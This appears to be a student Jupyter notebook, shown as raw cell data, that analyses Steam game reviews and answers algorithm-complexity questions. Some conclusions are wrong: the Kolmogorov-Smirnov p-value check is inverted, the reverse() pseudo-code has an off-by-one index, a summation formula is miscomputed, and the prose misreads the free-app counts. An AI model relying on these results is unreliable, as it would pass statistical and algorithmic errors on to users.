[
[
"At this point we have also wanted to compute the percentage of reviews that have received at least a funny vote among all these three languages. ",
"_____no_output_____"
]
],
[
[
"# same as above\nprint(\"The percentage of reviews written in one of the top 3 language that has received at \"\n \"least a funny vote is \" + '\\033[1m' + str(round((sum(numeratore_1)/sum(denominatore_1))*100, 2)) + \"%\" + '\\033[0m')",
"The percentage of reviews written in one of the top 3 language that has received at least a funny vote is \u001b[1m12.21%\u001b[0m\n"
]
],
[
[
"### Use the function created in the literal “a” to find what percentage of these reviews (associated with the top 3 languages) were voted as helpful?",
"_____no_output_____"
],
[
"For this request we have used the new filtered dataset and for each language we have selected the reviews that have received at least one helpful vote and then we have computed the ratio between them and all the reviews written in that language.\n\nTo compute this percentage we have used **dataset_filter** that is the new dataframe obtained using the previous function **filtro**",
"_____no_output_____"
]
],
[
[
"numeratore_2 = []\ndenominatore_2 = []\nrapporto_2 = []\nfor i in range(len(top_languages)):\n numeratore_2.append(dataset_filter.loc[(dataset_filter.votes_helpful != 0) & (dataset_filter.language == top_languages[i])].votes_helpful.count())\n denominatore_2.append(dataset_filter[dataset_filter.language == top_languages[i]].votes_helpful.count())\n rapporto_2.append(round((numeratore_2[i]/denominatore_2[i])*100, 2))\n print(\"The percentage of reviews written in \" + '\\033[1m' + top_languages[i] + '\\033[0m' +\n \" that has received at least a helpful vote is \" +\n '\\033[1m' + str(rapporto_2[i]) + \"%\" + '\\033[0m')",
"The percentage of reviews written in \u001b[1menglish\u001b[0m that has received at least a helpful vote is \u001b[1m29.2%\u001b[0m\nThe percentage of reviews written in \u001b[1mschinese\u001b[0m that has received at least a helpful vote is \u001b[1m25.1%\u001b[0m\nThe percentage of reviews written in \u001b[1mrussian\u001b[0m that has received at least a helpful vote is \u001b[1m35.5%\u001b[0m\n"
]
],
[
[
"At this point we have also wanted to compute the percentage of reviews that have received at least a helpful vote among all these three languages.",
"_____no_output_____"
]
],
[
[
"# same as above\nprint(\"The percentage of reviews written in one of the top 3 language that has received at \"\n \"least a helpful vote is \" + '\\033[1m' + str(round((sum(numeratore_2)/sum(denominatore_2))*100, 2)) + \"%\" + '\\033[0m')",
"The percentage of reviews written in one of the top 3 language that has received at least a helpful vote is \u001b[1m29.16%\u001b[0m\n"
]
],
[
[
"# RQ5",
"_____no_output_____"
],
[
"### Plot the top 10 most popular reviewers and the number of reviews.",
"_____no_output_____"
]
],
[
[
"num_reviewers = dataset['author.steamid'].value_counts().head(10)",
"_____no_output_____"
],
[
"num_reviewers.plot(kind='bar',\n xlabel='TOP 10 reviewers',\n ylabel='number of reviews')",
"_____no_output_____"
]
],
[
[
"### What applications did the most popular author review?\n",
"_____no_output_____"
],
[
"At first, we took the previous result of the most popular author to leave only the rows of the reviews written by him/her, and then we returned all the applications reviewed by this author.",
"_____no_output_____"
]
],
[
[
"num_rev = pd.DataFrame({'reviewers':num_reviewers.index, 'num_reviews':num_reviewers.values})",
"_____no_output_____"
],
[
"pop_auth = num_rev['reviewers'][0]",
"_____no_output_____"
],
[
"apps_rev = dataset[dataset['author.steamid'] == pop_auth].app_name",
"_____no_output_____"
],
[
"app_name_rev = list(apps_rev.values)",
"_____no_output_____"
],
[
"app_name_rev = [el for el, count in Counter(app_name_rev).items()]",
"_____no_output_____"
],
[
"print(app_name_rev)",
"['Half-Life', 'Counter-Strike: Source', 'Half-Life 2: Episode Two', 'Portal 2', \"Garry's Mod\", \"Sid Meier's Civilization V\", 'Dead by Daylight', \"Sid Meier's Civilization VI\", 'Subnautica', 'Human: Fall Flat', 'Banished', 'Celeste', 'Getting Over It with Bennett Foddy', 'A Hat in Time', 'The Forest', 'Axiom Verge', 'The Binding of Isaac: Rebirth', 'To the Moon', 'Cave Story+', 'Titan Souls', 'Super Meat Boy', \"Don't Escape: 4 Days to Survive\", 'Volgarr the Viking', 'Enter the Gungeon', 'Salt and Sanctuary', 'Hollow Knight', 'The End Is Nigh', 'Factorio', 'RimWorld', 'Insurgency: Sandstorm', 'Euro Truck Simulator 2', 'Foundation', 'Kenshi', 'Into the Breach', 'Warhammer: Vermintide 2', 'DOOM Eternal', 'Age of Empires: Definitive Edition', 'Void Bastards', 'Stardew Valley', 'Among Us', 'Blackwake', 'Little Nightmares', 'Bomber Crew', 'Rust', 'HITMAN™ 2', 'Phasmophobia', 'Mount & Blade: Warband', 'Resident Evil 2', 'Slime Rancher', 'Hotline Miami', 'Tomb Raider', 'BattleBlock Theater', 'Dishonored', 'South Park™: The Stick of Truth™', 'Undertale', \"Don't Starve\", 'Rocket League', 'Dead Cells', 'Broforce', 'The Wolf Among Us', 'The Walking Dead', 'One Finger Death Punch', 'Oxygen Not Included', 'Cuphead', 'ULTRAKILL', 'Castle Crashers', 'Townscaper', 'Papers, Please', 'GRIS', 'DUSK', 'Outlast', 'FTL: Faster Than Light', 'Dying Light', 'American Truck Simulator', 'Saints Row: The Third', 'STAR WARS™ Empire at War: Gold Pack', 'Age of Empires II (2013)', 'Super Hexagon', 'BioShock Infinite', 'DOOM', 'Black Mesa', 'Finding Paradise', 'Keep Talking and Nobody Explodes', 'Duck Game', 'Mark of the Ninja', 'Phoenix Wright: Ace Attorney Trilogy', 'Gunpoint', \"PLAYERUNKNOWN'S BATTLEGROUNDS\", 'Monster Hunter: World', 'The Elder Scrolls Online', 'Total War: WARHAMMER II', 'Cities: Skylines', 'Stellaris', 'Black Desert Online', 'Kingdom Come: Deliverance', 'Jurassic World Evolution', 'ARK: Survival Evolved', \"No Man's Sky\", 'Frostpunk', 'Fallout 4', 'DARK SOULS™ III', 'Rise of the Tomb Raider', 'Middle-earth™: Shadow of War™', 'Hearts of Iron IV', 'They Are Billions', 'Total War Saga: Thrones of Britannia', 'Total War: ROME II - Emperor Edition', 'Terraria', 'PAYDAY 2', 'XCOM 2', 'Deep Rock Galactic', 'Hunt: Showdown', 'Conan Exiles', 'Two Point Hospital', 'Total War: WARHAMMER', 'The Elder Scrolls V: Skyrim Special Edition', 'NieR:Automata™', 'House Flipper', 'Surviving Mars', 'Ni no Kuni™ II: Revenant Kingdom', 'Railway Empire', 'Rise of Industry', 'Devil May Cry HD Collection', 'Heroes of Hammerwatch', 'Ghost of a Tale', 'Ancestors Legacy', 'FAR: Lone Sails', 'Totally Accurate Battlegrounds', 'Vampyr', 'Yakuza 0', 'Thief Simulator', 'Darksiders III', 'Mutant Year Zero: Road to Eden', 'Just Cause 4', 'Planet Coaster', 'Nioh: Complete Edition', 'Europa Universalis IV', 'Just Cause 3', 'Resident Evil 7 Biohazard', 'Urban Empire', 'Youtubers Life', 'Night in the Woods', 'Northgard', 'Sniper Elite 4', 'Day of Infamy', 'SimAirport', 'Dead Rising 4', 'Styx: Shards of Darkness']\n"
]
],
[
[
"### How many applications did he/she purchase, and how many did he/she get as free? Provide the number (count) and the percentage.",
"_____no_output_____"
]
],
[
[
"# taking only the steam_purchase and received_for_free apps of the author\napp_count = dataset[dataset['author.steamid'] == pop_auth][['steam_purchase', 'received_for_free']]",
"_____no_output_____"
],
[
"# how many app did the author reviewed\ntot_app_rev = len(app_count.index)\n",
"_____no_output_____"
],
[
"purchased = dict(Counter(app_count['steam_purchase']))\nfree_apps = dict(Counter(app_count['received_for_free']))",
"_____no_output_____"
],
[
"purchased[True] = [purchased[True], \"{:.2%}\".format(purchased[True]/tot_app_rev)]\npurchased[False] = [purchased[False], \"{:.2%}\".format(purchased[False]/tot_app_rev)]\nfree_apps[True] = [free_apps[True], \"{:.2%}\".format(free_apps[True]/tot_app_rev)]\nfree_apps[False] = [free_apps[False], \"{:.2%}\".format(free_apps[False]/tot_app_rev)]",
"_____no_output_____"
],
[
"purch_df = pd.DataFrame(purchased, index=['count', 'Percentage']).T\nfree_df = pd.DataFrame(free_apps, index=['count', 'Percentage']).T",
"_____no_output_____"
],
[
"purch_df.index.name = 'App Purchased'\nfree_df.index.name = 'App given Free'",
"_____no_output_____"
],
[
"purch_df",
"_____no_output_____"
]
],
[
[
"`True` means that the apps were purchased, `False` doesn't.",
"_____no_output_____"
]
],
[
[
"free_df",
"_____no_output_____"
]
],
[
[
"`True` means that the apps were given for free, `False` doesn't.",
"_____no_output_____"
],
[
"There is a significant difference between the purchased and the free apps: the first ones were mostly purchased on Steam, and the latter only 4 apps were given for free, then this means that not every app that the author reviewed was purchased on Steam, because if we assume that all the purchased apps are counted also in the \"not given for free\" ones, then we have 35 apps purchased somewhere else, and counting also the 4 apps given for free, we have all the apps not purchased on Steam, which are 39.",
"_____no_output_____"
],
[
"### How many of the applications he/she purchased reviewed positively, and how many negatively? How about the applications he received for free?",
"_____no_output_____"
]
],
[
[
"# have to use the recommended col\napp_recomm = dataset.loc[(dataset['author.steamid'] == pop_auth) & (dataset['recommended'] == True)][['steam_purchase', 'received_for_free']]",
"_____no_output_____"
],
[
"purchased_rec = dict(Counter(app_recomm['steam_purchase']))\nfree_apps_rec = dict(Counter(app_recomm['received_for_free']))\ntot_app_rec = len(app_recomm.index)",
"_____no_output_____"
],
[
"print('{} applications purchased were reviewed positively, and {} were reviewed negatively'\n .format(purchased_rec[True], purchased_rec[False]))\nprint('{} applications given for free were reviewed positively, and {} were reviewed negatively'\n .format(free_apps_rec[True], free_apps_rec[False]))",
"108 applications purchased were reviewed positively, and 38 were reviewed negatively\n4 applications given for free were reviewed positively, and 142 were reviewed negatively\n"
]
],
[
[
"Comparing these results with the ones in the previous question, we can see that 3 apps were not recommended positively nor negatively, and those are, using the same hypothesis of the previous answer, 2 purchased on Steam and 1 purchased elsewhere. Also we can see that all apps given for free where recommended positively, which means that the author liked playing with them (and we assume that he/she also liked their quality of being \"free\")",
"_____no_output_____"
],
[
"# RQ6 \n",
"_____no_output_____"
],
[
"### What is the average time (days and minutes) a user lets pass before he updates a review?",
"_____no_output_____"
],
[
"Just to start we have computed the difference between the time when the review is written and time when the review is updated and then we have transformed this difference in terms of days",
"_____no_output_____"
]
],
[
[
"dataset['difference_days'] = (dataset['timestamp_updated'] - dataset['timestamp_created'])\ndataset['difference_days'] = dataset['difference_days']/np.timedelta64(1,'D')",
"_____no_output_____"
]
],
[
[
"After that we have deleted who did not update his review because we have thought that is meaningless consider them. Then we have computed the mean between days and the integer part of this number represents the average number of days after an author updates his review. Instead to transform the decimal part in minutes we have to multiply it for 1440 because in one day there are 1440 minutes. We have made a simple proportion: *1 : 1440 = x : (decimal part of our number)*",
"_____no_output_____"
]
],
[
[
"dataset_1 = dataset[dataset.difference_days != 0]\naverage = dataset_1.difference_days.mean()\nminutes = round((average % 1) * 1440, 0)\ndays = average // 1\nprint(\"The average time a user lets pass before he updates a review is \"+\n '\\033[1m' + str(days) + '\\033[0m' + \" days and \" + '\\033[1m' + str(minutes) + '\\033[0m' + \" minutes\")",
"The average time a user lets pass before he updates a review is \u001b[1m321.0\u001b[0m days and \u001b[1m46.0\u001b[0m minutes\n"
]
],
[
[
"On average an author updates his review almost after a year! ",
"_____no_output_____"
],
[
"### Plot the top 3 authors that usually update their reviews.",
"_____no_output_____"
],
[
"We have used the dataframe **dataset_1** in which there are only the reviews that have been updated. We did not use the starting dataset because we have to extract who are the authors that usually update their reviews so authors that have updated more reviews through time.",
"_____no_output_____"
]
],
[
[
"a = pd.Series(dataset_1.groupby('author.steamid').review_id.count().sort_values(ascending=False).head(3))\na",
"_____no_output_____"
],
[
"#bar plot\nplt.figure(figsize=(12, 8))\nax = a.plot(kind=\"bar\", color = [\"orchid\", \"orange\", \"green\"], alpha=0.75, rot=0)\nax.set_title(\"TOP 3 authors that have updated more reviews\")\nax.set_xlabel(\"Steam ID\")\nax.set_ylabel(\"Number of reviews updated\")\n#needed to put values on top of the bar\nfor i, v in enumerate(a.values):\n ax.text(i, v+1, str(v), color='black', fontweight='bold')",
"_____no_output_____"
]
],
[
[
"We have put the number of reviews over the bars because the second and the third author have updated almost the same number of reviews.",
"_____no_output_____"
],
[
"# RQ7",
"_____no_output_____"
],
[
"### What’s the probability that a review has a Weighted Vote Score equal to or bigger than 0.5?",
"_____no_output_____"
],
[
"We have used the definition of probability to compute these values indeed we have count the number of reviews that has a Weighted Vote Score equal to or bigger than 0.5 and this number represents the favourable case (we have stored this number in **casi_fav**)while the number of total case is represented by the number of the lines of our dataset, stored in **casi_tot**. The probability is the ratio between them. ",
"_____no_output_____"
]
],
[
[
"#filter the dataset picking only weighted_vote_score >= 0.5\n#and count the rows of filter dataset\ncasi_fav = dataset[dataset.weighted_vote_score >= 0.5].weighted_vote_score.count()",
"_____no_output_____"
],
[
"#number of rows of initial dataset\ncasi_tot = dataset.weighted_vote_score.count()",
"_____no_output_____"
],
[
"result_1 = round(casi_fav/casi_tot, 2)\nprint(\"The probability is of a review has a Weighted Vote Score equal to or bigger than 0.5 is \"+ '\\033[1m' +str(result_1)+'\\033[0m')",
"The probability is of a review has a Weighted Vote Score equal to or bigger than 0.5 is \u001b[1m0.22\u001b[0m\n"
]
],
[
[
"### What’s the probability that a review has at least one vote as funny given that the Weighted Vote Score is bigger than 0.5?",
"_____no_output_____"
],
[
"We want to compute this conditional probability P(B|A) where B is the event: *a review has at least one vote as funny*. The sample space will be reduced, indeed we have filtered the dataset in such way that we are going to look for reviews with at least one vote as funny just among reviews with Weighted Vote Score is bigger than 0.5.",
"_____no_output_____"
]
],
[
[
"#new sample space: filter dataset like before\n# A\ndataset_prob = dataset[dataset.weighted_vote_score > 0.5]",
"_____no_output_____"
],
[
"#count the reviews with at least a funny vote in the new filter dataset\n#B intersect A\ncasi_fav_2 = dataset_prob[dataset_prob.votes_funny != 0].votes_funny.count()",
"_____no_output_____"
],
[
"#A\ncasi_tot2 = dataset_prob.weighted_vote_score.count()\n#P(B|A)\nresult_2 = round(casi_fav_2/casi_tot2, 2)\nprint(\"The conditional probability that a review has at least one vote as funny given that the Weighted Vote Score is bigger than 0.5 is \",'\\033[1m' +str(result_2)+'\\033[0m')",
"The conditional probability that a review has at least one vote as funny given that the Weighted Vote Score is bigger than 0.5 is \u001b[1m0.25\u001b[0m\n"
]
],
[
[
"### Is the probability that “a review has at least one vote as funny” independent of the “probability that a review has a Weighted Vote Score equal or bigger than 0.5\"?",
"_____no_output_____"
],
[
"To be independent these two events it would happen that the probability of the event B: *a review has at least one vote as funny* would be equal to *probability that a review has at least one vote as funny given that the Weighted Vote Score is equal or bigger than 0.5, that is P(B|A);* because in this way the conditioning of the two probability is useless given that they are independent.",
"_____no_output_____"
],
[
"To be independent these two events it would happen that the P(B) would be equal to P(B|A) because in this way the conditioning of the two probability is useless given that they are independent: P(B|A) = P(B).",
"_____no_output_____"
]
],
[
[
"#P(B|A)\ncasi_fav_ba = dataset[(dataset.weighted_vote_score >= 0.5) & (dataset.votes_funny != 0)].votes_funny.count()\nresult_3a = round(casi_fav_ba/casi_fav, 2)\nprint(\"The conditional probability that a review has at least one vote as funny given that the Weighted Vote Score is equal or bigger than 0.5 is \",'\\033[1m' +str(result_3a)+'\\033[0m')",
"The conditional probability that a review has at least one vote as funny given that the Weighted Vote Score is equal or bigger than 0.5 is \u001b[1m0.25\u001b[0m\n"
],
[
"#count the reviews with at least a funny vote in the starting dataset\n#B\ncasi_fav_3 = dataset[dataset.votes_funny != 0].votes_funny.count()",
"_____no_output_____"
],
[
"#P(B)\nresult_3 = round(casi_fav_3/casi_tot,2)\nprint(\"The probability of a review has at least one vote as funny is \"+ '\\033[1m' +str(result_3)+'\\033[0m')",
"The probability of a review has at least one vote as funny is \u001b[1m0.12\u001b[0m\n"
]
],
[
[
"0.12 is different from 0.25 so these two events are **dependent!**",
"_____no_output_____"
],
[
"# RQ8",
"_____no_output_____"
],
[
"### Is there a significant difference in the Weighted Vote Score of reviews made in Chinese vs the ones made in Russian? Use an appropriate statistical test or technique and support your choice.",
"_____no_output_____"
],
[
"We'll use a non-parametric(Kolgomoronov-Smirnov) test in order to find if the 2 distribution are the same(comes from the same population) or not, since the 2 distributions are not normally distributed",
"_____no_output_____"
]
],
[
[
"data_lang = functions.get_reviews_by_languages(dataset,[\"schinese\",\"russian\"])",
"_____no_output_____"
]
],
[
[
"First at all we compare chinese weighted score distribution and russian weighted score distribution using histograms. At first glance there does not seem to be any significant differences between the two distribution. From this plot those 2 distributions seems that distributes equally.",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize = (10,8))\ndata_lang[data_lang.language == \"schinese\"].weighted_vote_score.plot(kind = \"hist\", label = \"Chinese\",alpha = 0.3)\ndata_lang[data_lang.language == \"russian\"].weighted_vote_score.plot(kind = \"hist\", label = \"Russian\", color = \"orange\",alpha = 0.3)\nplt.legend()",
"_____no_output_____"
]
],
[
[
"So we can support the choice with a statistaical test.Let's check with the KS test",
"_____no_output_____"
]
],
[
[
"k_smir_test = ks_2samp(data_lang[data_lang.language == \"schinese\"].weighted_vote_score,\n data_lang[data_lang.language == \"russian\"].weighted_vote_score)\nif k_smir_test.pvalue <= 0.1:\n print(\"the two distributions are identical.\")\nelse:\n print(f\"the 2 distributions are different with a pvalue of {k_smir_test.pvalue}\")",
"the two distributions are identical.\n"
]
],
[
[
"The Kolmogorov-Smirnov test is a non-parametric test that checks the shape of sample distributions. It can be used to compare two samples and It does not in itself require any assumptions about the sample distribution, like in our case. The acceptance of the H0 hypothesis predicts that the two distributions belong to the same population.",
"_____no_output_____"
],
[
"### Can you find any significant relationship between the time that a user lets pass before he updates the review and the Weighted Vote Score? Use an appropriate statistical test or technique and support your choice.",
"_____no_output_____"
],
[
"We'll discover if there is a relationship into 3 step:\n * plot\n * pearson correlations\n * Linear Regression",
"_____no_output_____"
]
],
[
[
"# step 1: plot\nplt.figure(figsize = (10,8))\nplt.scatter(dataset.difference_days, dataset.weighted_vote_score)\nprint(\"no relationship visible\")",
"no relationship visible\n"
],
[
"# step 2: pearson correlation\nprint(pearsonr(dataset.difference_days, dataset.weighted_vote_score))\nprint(\"no relations detected \")",
"(0.07204700562113138, 0.0)\nno relations detected \n"
],
[
"X = dataset[[\"difference_days\"]]\nX = sm.add_constant(X).values\nmodel = sm.OLS(dataset.weighted_vote_score, X)\nres = model.fit()",
"_____no_output_____"
],
[
"res.summary()",
"_____no_output_____"
]
],
[
[
"using Simple Linear Regression (1 X variable) is the same that using pearsonr because\n$R^{2}Score = (pearsonr)^2 $",
"_____no_output_____"
]
],
[
[
"p = pearsonr(dataset.difference_days, dataset.weighted_vote_score)\nprint(f\"pearsonr {p[0]}\\npearsonr^2 = {p[0]**2} -> same as R-squared detected above\")",
"pearsonr 0.07204700562113138\npearsonr^2 = 0.005190771018971337 -> same as R-squared detected above\n"
]
],
[
[
"The second test is linear regression: also in this case there is no evidence that between two variables there is a sort of correlation.",
"_____no_output_____"
],
[
"### Is there any change in the relationship of the variables mentioned in the previous literal if you include whether an application is recommended or not in the review? Use an appropriate statistical test or technique and support your choice.",
"_____no_output_____"
],
[
"just adding another variable into Linear Regression",
"_____no_output_____"
]
],
[
[
"X = dataset[[\"difference_days\",\"recommended\",\"weighted_vote_score\"]].astype({\"recommended\":int})\nmodel = smf.ols(\"weighted_vote_score ~ difference_days + C(recommended)\", data=X)\nres = model.fit()\nres.summary()",
"_____no_output_____"
]
],
[
[
"no changes in relationships",
"_____no_output_____"
],
[
"### What are histograms, bar plots, scatterplots and pie charts used for?",
"_____no_output_____"
],
[
"Histogram: This type of data visualization helps to interpret univariate analysis results. Simply put, it shows where data points are dense and where they are sparse in one dimension. However, instead of comparing the categorical data, it breaks down a numeric data into interval groups and shows the frequency of data fall into each group. Histogram is good at identifying the pattern of data distribution on a numeric spectrum.\n\nBar Chart: Bar chart compares the measure of categorical dimension. Bar chart is very similar to a histogram. The fundamental difference is that the x-axis of bar charts is categorical attribute instead of numeric interval in the histogram. Furthermore, bar chart is not just limited to plot one categorical data. An extension of bar chart, clustered bar chart (or group bar chart) compares two categorical attributes.\n\nScatterplot: It plots one numeric attribute against another numeric attribute and visualizes the correlation between axes. Scatter plot is commonly applied to identify regression type of relationships such as linear regression, logistic regression etc. It also provides a robust analysis of the correlation significance. We can estimate that the correlation relationship is stronger,linearly, when the data points lying on a line with a certaing degree, whereas the relationship is weak if the line is flat.\n\nPiechart: It is used to represent the percentage and weight of components belonging to one categorical attribute. The size of the pie slice is proportional to the percentage, hence it intuitively depicts how much each component occupies the whole.",
"_____no_output_____"
],
[
"### What insights can you extract from a Box Plot?",
"_____no_output_____"
],
[
"A boxplot shows the distribution of the data with more detailed information. from Box Plot we can \"extract\" information such as outliers, maximum, minimum, first quartile(Q1), third quartile(Q3), interquartile range(IQR), and median. It also gives you the information about the skewness of the data, how tightly closed the data is and the spread of the data.",
"_____no_output_____"
],
[
"# TQ1\n## Question 1\nAs known, given a random variable $X$, the Quantile function *Q($\\cdot$)* with support $\\{ p | p \\in [0,1] \\}$ is the function that computes:\n\n\\begin{equation}\nQ(p)=s \\hspace{0.2 cm} |\\hspace{0.2 cm} \\mathcal{P}(X<=s) = p\n\\end{equation}\n\nDenoting with $A_i$ the i-th element of the vector $A$ of length $n$ and given $k \\in [0,n]$, it is possible to see that our algorithm compute:<br>\n\n\\begin{equation}\n alg(A,k)=s \\hspace{0.2 cm} |\\hspace{0.2 cm} \\#\\{A_i<=s\\} = k\n\\end{equation}\n\nIt is then easily possible to perform some trasformations over our algorithm parameters in order to obtain the similarities with the quantile function, i.e.:\n\n1. A shrinkage over our algorithm support space (i.e. $k'=k/n$);\n\n2. A shrinkage over our cardinality measure (i.e. $\\#\\{A_i<=s \\}'=\\frac{\\#\\{A_i<=s \\}}{n}$);\n\nSubstituting into our $alg(A,k)$ it becomes:\n\\begin{equation}\n alg(A,k')=s\\hspace{0.2 cm} |\\hspace{0.2 cm} \\frac{\\#\\{A_i<=s\\}}{n} = k'\n\\end{equation}\nIn a frequentist approach (said $A_r$ a random sample of the vector $A$) we can equal $\\frac{\\#\\{A_i<=s\\}}{n}= \\mathcal{P}(A_r <= s)$; In words, our algorithm is computing the value $s$ so that the number of elements in the array $A$ smaller or equal to $s$ will be equal to $k$: we can so somehow define our algorithm a \"quantile function over a non-normalized support\".\n## Question 2\nWe initially note that the subdivision of the array $A$ (over which we are calling $alg()$) into $L$ and $R$ requires to scan the whole vector $A$ (i.e. requires $n=len(A)$ operations). Let consider the worst case scenario, i.e. imagine that $k=n$ and that at each iteration the random sample $s$ will always be equal to $A_1$: it basically means that the $s$ satisfying the condition over $k$ will be selected at the $n_{th}-1$ call of $alg()$ (iteration at which the vector $A$ over which we are calling $alg()$ has lenght equal to 2). We are so going to remove at each call of $alg()$ a single element, i.e. the smallest element in $A$. Due to this, the number of operations needed to scan the vector $A$ will decrease of one unit at each iteration of $alg()$. So we have that:\n $$\n T(n)=n+(n-1)+(n-2)+(n-3)+...+(n-(n-1)) = \\sum_{i=0}^{i=n-1}(n-i)=\\frac{1}{2}n(n-1)\n $$ \n(We recall that the sum is executed over $n-1$ iteration because we need $n-1$ call of $alg()$ to reach the right $s$). We can so assume an asymptotical complexity in the worst case scenario (removing costant therms) equal to $\\mathcal{O}(n^2)$.\n## Question 3\nIn the best case scenario, the right $s$ will be picked up at the first iteration: we only need $n$=len($A$) operation to scan $A$ and divide it into $L$ and $R$ : the asymptotical complexity will then be equal to $\\mathcal{O}(n)$.",
"_____no_output_____"
],
[
"# TQ2\n## Question 1\nLet dive into the interpretation of the given recursive algorithm's complexity. It is clear that, given a particular $n$ and $\\forall l$, and expressing with $T(n)$ the time needed to complete the algorithm called with parameter $n$:\n\n\\begin{equation}\n T(n) = T\\left(\\frac{n}{2}\\right)\\cdot 2 + \\left(\\frac{n}{2}+1\\right)\\cdot 3\n\\end{equation}\n\nIndeed, calling **splitSwap(a,l,n)** we will have to solve two times **splitSwap(a,l,n/2)** plus execute 3 operations for each of the $\\left(\\frac{n}{2}+1\\right)$ iterations of the for loop into **swapList(a,l,n)**. Lets compute running times after the expression of $T(n)$:\n\n\\begin{equation}\n T\\left(\\frac{n}{2}\\right) = T\\left(\\frac{n}{2^2}\\right)\\cdot 2 + \\left(\\frac{n}{2^2}+1\\right)\\cdot 3\n\\end{equation}\n\n\\begin{equation}\n T(n) = T\\left(\\frac{n}{2^2}\\right)\\cdot 2^2 + \\left(\\frac{n}{2^2}+1\\right)\\cdot2 \\cdot 3 +\\left(\\frac{n}{2}+1\\right)\\cdot 3\n\\end{equation}\n\n\\begin{equation}\n T(n) = T\\left(\\frac{n}{2^2}\\right)\\cdot 2^2 + \\left(\\frac{n}{2}+1\\right)\\cdot2 \\cdot 3 +3\n\\end{equation}\n\n\\begin{equation}\n T\\left(\\frac{n}{2^2}\\right) = T\\left(\\frac{n}{2^3}\\right)\\cdot 2 + \\left(\\frac{n}{2^3}+1\\right)\\cdot 3\n\\end{equation}\n\n\\begin{equation}\n T(n) = T\\left(\\frac{n}{2^3}\\right)\\cdot 2^3 + \\left(\\frac{n}{2}+1\\right)\\cdot 3 \\cdot 3 +7\n\\end{equation}\n\n\\begin{equation}\n T(n) = T\\left(\\frac{n}{2^k}\\right)\\cdot 2^k + \\left(\\frac{n}{2}+1\\right)\\cdot k \\cdot 3 +log_2(2^k)-1\n\\end{equation}\n\nSetting $2^k=n \\Leftrightarrow k =log_2(n)$ we obtain:\n\n\\begin{equation}\n T(n) = T(1)\\cdot n + \\left(\\frac{n}{2}+1\\right)\\cdot log_2(n) \\cdot 3 +log_2(n)-1 \\simeq n\\cdot log_2(n)\n\\end{equation}\n\nIn the latter we have removed the dependency from factors, constant terms and considered only the term with the biggest growth rate w.r.t $n$. We can than say that the asymptotical complexity of the algorithm is $\\mathcal{O}(n\\cdot log_2(n))$.\n\n## Question 2\nGiven an array **a**, an index **l** and a number **n** (considering the scenario where both **len(a)** and **n** are power of 2 numbers), the algorithm output the array **a'** built as follows:\n\n\\begin{equation}\n a'[i]=a[i] \\hspace{1cm}\\forall i \\in [0,1,...,l-1]\\hspace{1cm}\\mbox{if}\\hspace{1cm} l \\geq 1\n\\end{equation}\n\n\\begin{equation}\n a'[l+i]=a[l+n-i]\n\\end{equation}\n\nIn words, starting from an index **l** of the original array **a**, the algorithm is reversing the position of the first **n** elements of the array. Because of this of course it is required that **l+n** $\\leq$ **len(a)**, otherwise the subroutine **swapList()** will raise an error because of the out-of-range index it loops on. Let describe the algorithm's mechanism. Looking at the code, we can assess how the only part of the code actually changing the position of the array's elements is the subroutine **swapList()**. Given a triplet **(a,l,n)**, once **splitSwap()** is called, it will recursively call himself with an **n** halfed call by call (i.e. **n**$^{(1)}$ =**n/2**, **n**$^{(2)}$ =**n**$^{(1)}/2$, **n**$^{(3)}$ =**n**$^{(2)}/2$ and so on). As we can see in the (Fig.1), after $\\text{log}_2(n)-1$ steps, the function **splitSwap(a,l,2)** will be called: in its execution both **splitSwap(a,l,1)** and **splitSwap(a,l+1,1)** will **return** (being **n**=1), finally allowing the execution of **swaplist(a,l,2)** (that we will call **final-node-subroutine** $\\forall l$) that will exchange the position of the array's elements **a[l]** with **a[l+1]**. Being **splitSwap(a,l,2)** completed, **splitSwap(a,l+2,2)** will be called. Similary, at the end of the execution its **final-node-subroutine** will exchange the position of the array's elements **a[l+2]** with **a[l+3]**. Basically the **final-node-subroutines** consider the array (starting from the element $a[l]$) as a sequence of $\\frac{n}{2}$ couples of elements and in each couple they exchange the 1st element with the 2nd one.\n\nRecalling that **splitSwap(a,l,2)** and **splitSwap(a,l+2,2)** where called in **splitSwap(a,l,4)**, **swapList(a,l,4)** (that we will call **semi-final-node-subroutine**) will finally be executed, exchanging the position of the array's elements **a[l]** with **a[l+2]** and **a[l+1]** with **a[l+3]**. So the role of **semi-final-node-subroutines** is to consider the array (starting from the element $a[l]$) as a sequence of $\\frac{n}{4}$ couples of couples and to exchange the position of the 1st element of the 1st couple with the 1st element of the 2nd couple, and the 2nd element of the 1st couple with the 2nd element of the 2nd couple. Basically, after the execution of all the **final-node-subroutines** and of the **semi-final-node-subroutines** the position of the 1st group of 4 elements of the original array will be reversed, the same for the 2nd group of 4 elements and so on. We can so climb our recursive function tree from the **final-node-subroutines** up to the top **first-final-node-subroutine** i.e. **swapList(a,l,n)**. We can see the effect of each kind of **subroutine** level over a test array in two examples at (Fig.2,3) recalling that the output of the **first-final-node-subroutine** will be equal to the algorithm's output.\n\nHaving assessed that the algorithm complexity is $\\simeq O(n\\cdot log_2(n))$, it is possible to confirm that the algorithm it's not optimal: infact it is easily possible to write some pseudo-code with a lower complexity than the given algorithm:\n\n```python\ndef reverse(a,l,n):\n reversed_array=a\n for i in range(n):\n reversed_array[i+l]=a[l+n-i]\n return reversed_array\n```\n\nWe can easily see that the **reverse()** algorithm complexity has now become (removing costant therms and factors) $O(n)$, proving that the **splitSwap()** algorithm was not optimal.",
"_____no_output_____"
],
[
"In order:<br>\nFig.1 :Reaching the first final-node-subroutine<br>\nFig.2 :Test over a with len(a)=n=16, l=0<br>\nFig.3 :Test over a with len(a)=16, n=8, l=7<br>",
"_____no_output_____"
],
[
"\n<figcaption align=\"center\"> Fig.1 :Reaching the first final-node-subroutine</figcaption>",
"_____no_output_____"
],
[
"=n=16, l=0\")\n<figcaption align=\"center\"> Fig.2 :Test over a with len(a)=n=16, l=0</figcaption>",
"_____no_output_____"
],
[
"=16, n=8, l=7\")\n<figcaption align=\"center\"> Fig.3 :Test over a with len(a)=16, n=8, l=7</figcaption>",
"_____no_output_____"
],
[
